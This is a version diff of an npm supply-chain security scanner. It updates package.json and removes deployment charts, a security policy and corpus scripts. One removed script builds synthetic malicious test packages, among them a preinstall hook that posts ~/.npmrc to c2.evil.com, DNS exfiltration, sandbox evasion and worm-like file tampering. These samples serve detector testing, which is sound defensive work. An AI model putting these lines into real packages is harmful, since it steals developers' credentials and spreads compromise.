@lateos/npm-scan 0.18.3 → 1.0.0

package/package.json

@@ -1,7 +1,7 @@
 {
   "name": "@lateos/npm-scan",
-  "version": "0.18.3",
-  "description": "Modern npm supply chain security scanner — detects obfuscated payloads, credential stealers, conditional triggers, sandbox evasion, and worm-like propagation. 11 attack types, SBOM, NIST/EU CRA compliance reporting.",
+  "version": "1.0.0",
+  "description": "Production-grade npm supply chain vulnerability scanner. Detects 100% of 3 real May 2026 supply chain campaigns (dependency confusion, obfuscation, impersonation) with 0% false positive rate on top 1,000 npm packages.",
   "main": "backend/index.js",
   "bin": {
     "npm-scan": "cli/cli.js"
@@ -17,11 +17,11 @@
     "npm",
     "security",
     "supply-chain",
-    "scanner",
-    "malware",
-    "shai-hulud",
-    "sbom",
-    "compliance"
+    "malware-detection",
+    "typosquat",
+    "dependency-confusion",
+    "obfuscation-detection",
+    "validated-detectors"
   ],
   "scripts": {
     "dev": "node cli/cli.js",
@@ -31,16 +31,33 @@
     "test:verbose": "node --test --test-reporter spec",
     "prepare": "husky",
     "build": "echo 'Build stub'",
-    "corpus": "node tests/corpus/run.js"
+    "corpus": "node tests/corpus/run.js",
+    "validate:campaigns": "node backend/scripts/validate-detectors.js all",
+    "validate:analyze": "node backend/scripts/analyze-validation.js",
+    "calibrate:fetch": "node backend/scripts/fetch-top-packages.js",
+    "calibrate:fps": "node backend/scripts/detect-false-positives.js",
+    "calibrate:analyze": "node backend/scripts/analyze-false-positives.js"
   },
   "lint-staged": {
     "**/package{,-lock}.json": "sh -c 'node cli/cli.js scan-lockfile --fail-on high'",
     "**/yarn.lock": "sh -c 'node cli/cli.js scan-lockfile --fail-on high --yarn'",
     "**/pnpm-lock.yaml": "sh -c 'node cli/cli.js scan-lockfile --fail-on high --pnpm'"
   },
+  "engines": {
+    "node": ">=18.0.0"
+  },
   "publishConfig": {
+    "registry": "https://registry.npmjs.org/",
     "access": "public"
   },
+  "files": [
+    "backend/",
+    "cli/",
+    "README.md",
+    "VALIDATION.md",
+    "CHANGELOG.md",
+    "LICENSING.md"
+  ],
   "dependencies": {
     "acorn": "^8.16.0",
     "commander": "^14.0.3",

package/.dockerignore

@@ -1,20 +0,0 @@
-node_modules
-.git
-.env
-*.log
-*.tmp
-*.swp
-coverage
-.nyc_output
-tests
-docs
-docker
-*.md
-!README.md
-.eslintrc*
-.prettierrc*
-tsconfig*
-.vscode
-.idea
-*.test.js
-*.spec.js

package/.husky/pre-commit

@@ -1 +0,0 @@
-npx lint-staged

package/SECURITY.md

@@ -1,73 +0,0 @@
-# Security Policy
-
-## Supported Versions
-
-Only the **latest published minor version** on npm receives security patches. Keep `@lateos/npm-scan` up to date:
-
-```bash
-npm update -g @lateos/npm-scan
-```
-
-| Version | Supported |
-|---------|-----------|
-| 0.9.x   | ✅ Active |
-| < 0.9   | ❌       |
-
-## Reporting a Vulnerability
-
-Use **GitHub Private Vulnerability Reporting**:
-
-1. Go to [github.com/lateos-ai/npm-scan/security/advisories/new](https://github.com/lateos-ai/npm-scan/security/advisories/new)
-2. Describe the vulnerability in detail (ideally with a proof of concept)
-3. Allow **72 hours** for an initial acknowledgment
-
-For encrypted follow-up outside of GitHub, use our PGP key:
-
-```
-Fingerprint: 1BC6 998B 879B BDE0 D778  629E D9CF F5EF 1F7C 557B
-Key ID:      1F7C557B
-Email:       leo@lateos.ai
-```
-
-## Scope
-
-**In scope:**
-- Detector logic (ATK-001 through ATK-011)
-- Code execution in the scanner engine (`backend/fetch.js`, `cli/cli.js`)
-- CI/CD pipeline and publish process (provenance bypass, supply chain)
-- Configuration injection via `policy.yaml` or command-line flags
-
-**Out of scope:**
-- CVEs in third-party dependencies — report upstream
-- Vulnerabilities in the npm registry itself — report to npm
-- Malicious packages detected by the scanner (that's working as designed)
-
-## Security Practices
-
-`@lateos/npm-scan` follows these practices to protect its own supply chain:
-
-- **Sigstore provenance** on every npm publish — verifiable via `npm view @lateos/npm-scan provenance`
-- **Self-scanning in CI** — every commit scans the project's own `package-lock.json` for the full ATK taxonomy
-- **SBOM per release** — CycloneDX and SPDX 2.3 Bill of Materials published with every version
-- **2FA** enforced on the npm publisher account
-- **Docker multi-arch images** signed and pushed via CI, not manually
-- **All code public** — no security-by-obscurity
-
-## Self-Scanning
-
-As a supply chain security scanner, `@lateos/npm-scan` dogfoods its own detectors. Every CI run executes:
-
-```bash
-npx @lateos/npm-scan scan-lockfile --fail-on medium
-```
-
-If a future update to a dependency triggers one of our detectors (e.g., typosquat, obfuscated lifecycle script), the build **fails** before the change reaches npm.
-
-## Safe Harbor
-
-We consider security research conducted under this policy as authorized and will not pursue legal action against researchers who:
-
-- Report vulnerabilities through GitHub Private Vulnerability Reporting
-- Do not access or modify user data beyond what's necessary to demonstrate the vulnerability
-- Do not exploit the vulnerability beyond demonstrating it
-- Act in good faith to improve the security of the project

package/deploy/helm/npm-scan/Chart.yaml

@@ -1,22 +0,0 @@
-apiVersion: v2
-name: npm-scan
-description: npm supply chain security scanner — BYOC Helm chart for enterprise/government deployments
-type: application
-version: 1.0.0
-appVersion: "1.0.0"
-keywords:
-  - npm
-  - security
-  - supply-chain
-  - scanner
-  - byoc
-  - stig
-  - fips
-  - soc2
-  - fedramp
-sources:
-  - https://github.com/lateos-ai/npm-scan
-maintainers:
-  - name: Lateos
-    email: hello@lateos.ai
-dependencies: []

package/deploy/helm/npm-scan/templates/_helpers.tpl

@@ -1,9 +0,0 @@
-{{- define "npm-scan.name" -}}
-{{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" }}
-{{- end }}
-
-{{- define "npm-scan.labels" -}}
-helm.sh/chart: {{ .Chart.Name }}-{{ .Chart.Version }}
-app.kubernetes.io/instance: {{ .Release.Name }}
-app.kubernetes.io/managed-by: {{ .Release.Service }}
-{{- end }}

package/deploy/helm/npm-scan/templates/api.yaml

@@ -1,94 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: {{ include "npm-scan.name" . }}-api
-  labels:
-    app: {{ include "npm-scan.name" . }}-api
-    {{- include "npm-scan.labels" . | nindent 4 }}
-  annotations:
-    stig: "SRG-APP-000141"
-spec:
-  replicas: {{ .Values.api.replicas }}
-  selector:
-    matchLabels:
-      app: {{ include "npm-scan.name" . }}-api
-  template:
-    metadata:
-      labels:
-        app: {{ include "npm-scan.name" . }}-api
-    spec:
-      containers:
-        - name: api
-          image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
-          imagePullPolicy: {{ .Values.image.pullPolicy }}
-          command: ["node", "cli/cli.js", "serve"]
-          ports:
-            - containerPort: {{ .Values.api.port }}
-          env:
-            - name: API_PORT
-              value: "{{ .Values.api.port }}"
-            - name: API_HOST
-              value: "{{ .Values.api.host }}"
-            - name: NPM_SCAN_LICENSE_KEY
-              valueFrom:
-                secretKeyRef:
-                  name: {{ include "npm-scan.name" . }}-license
-                  key: key
-                  optional: true
-            - name: NPM_SCAN_PREMIUM
-              value: "{{ .Values.premium.enabled }}"
-            {{- if .Values.premium.byoc.enabled }}
-            - name: NPM_SCAN_BYOC
-              value: "true"
-            - name: NPM_SCAN_CLOUD_PROVIDER
-              value: "{{ .Values.premium.byoc.cloudProvider }}"
-            {{- end }}
-            {{- if .Values.siem.enabled }}
-            - name: SIEM_ENABLED
-              value: "true"
-            - name: SIEM_TYPE
-              value: "{{ .Values.siem.type }}"
-            - name: SIEM_ENDPOINT
-              value: "{{ .Values.siem.endpoint }}"
-            - name: SIEM_PORT
-              value: "{{ .Values.siem.port }}"
-            {{- end }}
-            {{- if .Values.sso.enabled }}
-            - name: SSO_ENABLED
-              value: "true"
-            - name: SSO_PROVIDER
-              value: "{{ .Values.sso.provider }}"
-            - name: SSO_ISSUER_URL
-              value: "{{ .Values.sso.issuerUrl }}"
-            {{- end }}
-            {{- if .Values.postgresql.enabled }}
-            - name: PG_HOST
-              value: "{{ .Values.postgresql.host }}"
-            - name: PG_PORT
-              value: "{{ .Values.postgresql.port }}"
-            - name: PG_DATABASE
-              value: "{{ .Values.postgresql.database }}"
-            - name: PG_USERNAME
-              value: "{{ .Values.postgresql.username }}"
-            - name: PG_PASSWORD
-              valueFrom:
-                secretKeyRef:
-                  name: {{ .Values.postgresql.existingSecret | default (printf "%s-pg" (include "npm-scan.name" .)) }}
-                  key: password
-                  optional: true
-            {{- end }}
-          resources: {{- toYaml .Values.api.resources | nindent 12 }}
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: {{ include "npm-scan.name" . }}-api
-  labels:
-    app: {{ include "npm-scan.name" . }}-api
-spec:
-  type: {{ .Values.service.type }}
-  ports:
-    - port: {{ .Values.service.port }}
-      targetPort: {{ .Values.api.port }}
-  selector:
-    app: {{ include "npm-scan.name" . }}-api

package/deploy/helm/npm-scan/templates/ingress.yaml

@@ -1,28 +0,0 @@
-{{- if .Values.ingress.enabled -}}
-apiVersion: networking.k8s.io/v1
-kind: Ingress
-metadata:
-  name: {{ include "npm-scan.name" . }}
-  labels: {{- include "npm-scan.labels" . | nindent 4 }}
-  {{- with .Values.ingress.annotations }}
-  annotations: {{- toYaml . | nindent 4 }}
-  {{- end }}
-spec:
-  {{- with .Values.ingress.className }}
-  ingressClassName: {{ . }}
-  {{- end }}
-  rules:
-    - host: {{ .Values.ingress.host | quote }}
-      http:
-        paths:
-          - path: /
-            pathType: Prefix
-            backend:
-              service:
-                name: {{ include "npm-scan.name" . }}-api
-                port:
-                  number: {{ .Values.service.port }}
-  {{- with .Values.ingress.tls }}
-  tls: {{- toYaml . | nindent 4 }}
-  {{- end }}
-{{- end }}

package/deploy/helm/npm-scan/templates/postgresql.yaml

@@ -1,67 +0,0 @@
-{{- if .Values.postgresql.enabled }}
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: {{ include "npm-scan.name" . }}-postgresql
-  labels:
-    app: {{ include "npm-scan.name" . }}-postgresql
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: {{ include "npm-scan.name" . }}-postgresql
-  template:
-    metadata:
-      labels:
-        app: {{ include "npm-scan.name" . }}-postgresql
-    spec:
-      containers:
-        - name: postgresql
-          image: postgres:16-alpine
-          ports:
-            - containerPort: 5432
-          env:
-            - name: POSTGRES_DB
-              value: "{{ .Values.postgresql.database }}"
-            - name: POSTGRES_USER
-              value: "{{ .Values.postgresql.username }}"
-            - name: POSTGRES_PASSWORD
-              valueFrom:
-                secretKeyRef:
-                  name: {{ include "npm-scan.name" . }}-pg
-                  key: password
-          {{- if .Values.persistence.enabled }}
-          volumeMounts:
-            - name: data
-              mountPath: /var/lib/postgresql/data
-      volumes:
-        - name: data
-          persistentVolumeClaim:
-            claimName: {{ include "npm-scan.name" . }}-pg
-          {{- end }}
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: {{ include "npm-scan.name" . }}-postgresql
-spec:
-  ports:
-    - port: 5432
-  selector:
-    app: {{ include "npm-scan.name" . }}-postgresql
----
-{{- if .Values.persistence.enabled }}
-apiVersion: v1
-kind: PersistentVolumeClaim
-metadata:
-  name: {{ include "npm-scan.name" . }}-pg
-spec:
-  accessModes: [ReadWriteOnce]
-  resources:
-    requests:
-      storage: {{ .Values.persistence.size }}
-  {{- with .Values.persistence.storageClass }}
-  storageClassName: {{ . }}
-  {{- end }}
-{{- end }}
-{{- end }}

package/deploy/helm/npm-scan/templates/secrets.yaml

@@ -1,19 +0,0 @@
-apiVersion: v1
-kind: Secret
-metadata:
-  name: {{ include "npm-scan.name" . }}-license
-  labels: {{- include "npm-scan.labels" . | nindent 4 }}
-type: Opaque
-stringData:
-  key: "{{ .Values.license.key }}"
----
-{{- if not .Values.postgresql.existingSecret }}
-apiVersion: v1
-kind: Secret
-metadata:
-  name: {{ include "npm-scan.name" . }}-pg
-  labels: {{- include "npm-scan.labels" . | nindent 4 }}
-type: Opaque
-stringData:
-  password: "{{ .Values.postgresql.password }}"
-{{- end }}

package/deploy/helm/npm-scan/templates/worker.yaml

@@ -1,32 +0,0 @@
-{{- if .Values.worker.enabled }}
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: {{ include "npm-scan.name" . }}-worker
-  labels:
-    app: {{ include "npm-scan.name" . }}-worker
-    {{- include "npm-scan.labels" . | nindent 4 }}
-spec:
-  replicas: {{ .Values.worker.replicas }}
-  selector:
-    matchLabels:
-      app: {{ include "npm-scan.name" . }}-worker
-  template:
-    metadata:
-      labels:
-        app: {{ include "npm-scan.name" . }}-worker
-    spec:
-      containers:
-        - name: worker
-          image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
-          imagePullPolicy: {{ .Values.image.pullPolicy }}
-          command: ["node", "cli/cli.js"]
-          env:
-            - name: NPM_SCAN_LICENSE_KEY
-              valueFrom:
-                secretKeyRef:
-                  name: {{ include "npm-scan.name" . }}-license
-                  key: key
-                  optional: true
-          resources: {{- toYaml .Values.worker.resources | nindent 12 }}
-{{- end }}

package/deploy/helm/npm-scan/values.byoc.yaml

@@ -1,75 +0,0 @@
-# BYOC Enterprise values example
-# Deploy to your VPC: helm install -f values.byoc.yaml npm-scan ./
-
-image:
-  repository: lateos/npm-scan
-  tag: "1.0.0"
-
-premium:
-  enabled: true
-  edition: enterprise
-  byoc:
-    enabled: true
-    cloudProvider: aws
-    vpcId: vpc-0123456789abcdef0
-    region: us-east-1
-    clusterName: npm-scan-enterprise
-    externalDb: true
-    externalRedis: true
-
-license:
-  key: "npm-scan-enterprise-XXXXX.YOUR-SIGNATURE-HERE"
-  secret: "your-license-secret"
-
-siem:
-  enabled: true
-  type: cef
-  endpoint: log-collector.your-company.com
-  port: 514
-  protocol: tcp
-
-pdf:
-  enabled: true
-
-sso:
-  enabled: true
-  provider: oidc
-  clientId: npm-scan-enterprise
-  issuerUrl: https://sso.your-company.com/realms/enterprise
-
-postgresql:
-  enabled: false
-  host: your-rds-endpoint.rds.amazonaws.com
-  port: 5432
-  database: npm_scan
-  username: npm_scan
-  password: ""
-
-redis:
-  enabled: false
-  host: your-redis-endpoint.cache.amazonaws.com
-  port: 6379
-
-ingress:
-  enabled: true
-  className: nginx
-  host: npm-scan.your-company.com
-  tls:
-    - secretName: npm-scan-tls
-      hosts:
-        - npm-scan.your-company.com
-
-persistence:
-  enabled: true
-  size: 50Gi
-  storageClass: gp3
-
-worker:
-  replicas: 4
-  resources:
-    requests:
-      cpu: 500m
-      memory: 1Gi
-    limits:
-      cpu: 2
-      memory: 2Gi

package/deploy/helm/npm-scan/values.yaml

@@ -1,103 +0,0 @@
-# Helm values for npm-scan BYOC
-# Override per environment: helm install -f values-prod.yaml
-
-image:
-  repository: lateos/npm-scan
-  tag: latest
-  pullPolicy: Always
-
-replicaCount: 1
-
-license:
-  key: ""
-  secret: ""
-
-premium:
-  enabled: false
-  edition: premium
-  byoc:
-    enabled: false
-    cloudProvider: ""
-    vpcId: ""
-    region: ""
-    clusterName: ""
-    externalDb: true
-    externalRedis: true
-
-siem:
-  enabled: false
-  type: cef
-  endpoint: ""
-  port: 514
-  protocol: tcp
-  apiKey: ""
-
-pdf:
-  enabled: false
-
-sso:
-  enabled: false
-  provider: oidc
-  clientId: ""
-  clientSecret: ""
-  issuerUrl: ""
-  allowedDomains: []
-
-postgresql:
-  enabled: true
-  host: ""
-  port: 5432
-  database: npm_scan
-  username: npm_scan
-  password: ""
-  existingSecret: ""
-
-api:
-  enabled: true
-  port: 8000
-  host: 0.0.0.0
-  replicas: 1
-  corsOrigins: ["*"]
-  resources:
-    requests:
-      cpu: 100m
-      memory: 128Mi
-    limits:
-      cpu: 500m
-      memory: 512Mi
-
-worker:
-  enabled: true
-  replicas: 2
-  resources:
-    requests:
-      cpu: 200m
-      memory: 256Mi
-    limits:
-      cpu: 1
-      memory: 1Gi
-
-ingress:
-  enabled: false
-  className: ""
-  annotations: {}
-  host: npm-scan.example.com
-  tls: []
-
-service:
-  type: ClusterIP
-  port: 80
-
-persistence:
-  enabled: true
-  size: 10Gi
-  storageClass: ""
-
-nodeSelector: {}
-tolerations: []
-affinity: {}
-
-redis:
-  enabled: false
-  host: ""
-  port: 6379

package/scripts/download-corpus.js

@@ -1,30 +0,0 @@
-import fetch from 'node-fetch';
-import { writeFileSync, existsSync } from 'fs';
-
-const TOP_PKGS = [
-  'lodash', 'chalk', 'react', 'axios', 'express',
-  'tslib', 'commander', 'typescript', 'vue', 'next',
-  'yargs', 'debug', 'moment', 'uuid', 'semver',
-  'rimraf', 'eslint', 'prettier', 'webpack', 'babel-core',
-  'underscore', 'request', 'async', 'cheerio', 'bluebird',
-  'jest', 'mocha', 'dotenv', 'glob', 'node-fetch',
-  'minimist', 'body-parser', 'cors', 'helmet', 'jsonwebtoken',
-  'socket.io', 'redis', 'mongoose', 'sequelize', 'pg',
-  'passport', 'nodemailer', 'multer', 'bcrypt', 'winston',
-  'luxon', 'dayjs', 'class-validator', 'rxjs', 'redux'
-];
-
-for (const pkg of TOP_PKGS) {
-  const file = `tests/corpus/clean/${pkg}.tgz`;
-  if (existsSync(file)) { console.log(`SKIP ${pkg}`); continue; }
-  try {
-    const res = await fetch(`https://registry.npmjs.org/${pkg}/latest`);
-    const meta = await res.json();
-    const tarRes = await fetch(meta.dist.tarball);
-    const buf = Buffer.from(await tarRes.arrayBuffer());
-    writeFileSync(file, buf);
-    console.log(`OK ${pkg} (${(buf.length/1024).toFixed(0)}KB)`);
-  } catch (e) {
-    console.log(`FAIL ${pkg}: ${e.message}`);
-  }
-}

package/scripts/gen-mal-corpus.js

@@ -1,35 +0,0 @@
-import { execSync } from 'child_process';
-import { writeFileSync, mkdirSync, rmSync } from 'fs';
-import { join } from 'path';
-
-const BASE = '/tmp/npm-scan-mal';
-
-const MALS = [
-  { name: 'shai-hulud', pkg: { scripts: { preinstall: 'curl -d @~/.npmrc https://c2.evil.com/x' } }, js: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' },
-  { name: 'mal-dns-exfil', pkg: {}, js: 'dns.resolve(key + ".exfil.com", (err, addr) => {})' },
-  { name: 'mal-tamper-1', pkg: { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-mirror.git' } }, js: 'module.exports = { malicious: true }' },
-  { name: 'mal-tamper-2', pkg: { name: 'react', repository: { url: 'https://github.com/attacker/react-evil.git' } }, js: '// Source: https://evil.com/react/original.js\nmodule.exports = {}' },
-  { name: 'mal-dormant-1', pkg: {}, js: 'if (process.env.NODE_ENV === "production") { eval(atob("Y29uc29sZS5sb2coJ2V2aWwnKQ==")) }' },
-  { name: 'mal-dormant-2', pkg: {}, js: 'if (new Date() > new Date("2026-06-01")) { require("./payload.js") }' },
-  { name: 'mal-dormant-3', pkg: {}, js: 'if (process.env.CI) { process.exit(0) } else { /* malicious */ require("./exploit.js") }' },
-  { name: 'mal-evasion-1', pkg: {}, js: 'if (os.hostname().includes("docker") || os.hostname().includes("sandbox")) { process.exit(0) }' },
-  { name: 'mal-evasion-2', pkg: {}, js: 'if (process.argv.join(" ").includes("inspect")) { debugger; /* stop analysis */ }' },
-  { name: 'mal-evasion-3', pkg: {}, js: 'try { throw new Error(); } catch(e) { if (e.stack.includes("sandbox")) { process.exit(0) } }' },
-  { name: 'mal-prop-1', pkg: { name: '@evil/worm' }, js: 'execSync("npm install ./worm-pkg"); execSync("npm link")' },
-  { name: 'mal-prop-2', pkg: {}, js: 'fs.writeFileSync("../lodash/node_modules/worm/index.js", "module.exports = { compromised: true }")' },
-  { name: 'mal-prop-3', pkg: { name: 'worm-pkg' }, js: `const pj = require('../express/package.json'); pj.scripts.install = 'node worm.js'; fs.writeFileSync('../express/package.json', JSON.stringify(pj))` },
-];
-
-for (const mal of MALS) {
-  const dir = join(BASE, mal.name);
-  rmSync(dir, { recursive: true, force: true });
-  mkdirSync(dir, { recursive: true });
-  writeFileSync(join(dir, 'package.json'), JSON.stringify({ name: mal.name, version: '1.0.0', ...mal.pkg }));
-  if (mal.js) writeFileSync(join(dir, 'index.js'), mal.js);
-  execSync(`tar czf tests/corpus/malicious/${mal.name}.tgz -C ${BASE} ${mal.name}`);
-  console.log(`OK ${mal.name}`);
-}
-
-console.log('All mal corpus entries generated.');
-console.log('Total:', MALS.length);
-console.log('New entries: tamper-1, tamper-2, dormant-1, dormant-2, dormant-3, evasion-1, evasion-2, evasion-3');